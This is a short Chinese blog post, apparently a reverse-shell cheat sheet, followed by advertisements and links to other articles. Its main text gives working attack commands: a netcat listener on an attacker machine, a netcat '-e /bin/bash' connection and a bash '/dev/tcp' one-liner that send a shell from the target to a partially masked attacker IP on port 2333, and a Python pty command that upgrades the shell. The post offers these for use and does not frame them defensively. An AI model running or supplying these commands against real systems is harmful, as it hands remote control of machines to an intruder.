反弹Shell,看这一篇就够了
攻击机开启本地监听:
netcat -lvvp 2333
目标机主动连接攻击机:
netcat 47.xxx.xxx.187 2333 -e /bin/bash
# nc <攻击机IP> <攻击机监听的端口> -e /bin/bash
bash -i >& /dev/tcp/47.xxx.xxx.187/2333 0>&1
借助于python默认包含的一个pty标准库来获取一个标准的虚拟终端环境
python -c "import pty;pty.spawn('/bin/bash')"
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· winform 绘制太阳,地球,月球 运作规律
2018-05-31 Java代理和动态代理机制分析和应用
2012-05-31 dosfstools linux 下 vfat 文件系统检测
2011-05-31 用安全存储器实现FPGA的身份识别及防拷贝
2011-05-31 主板结构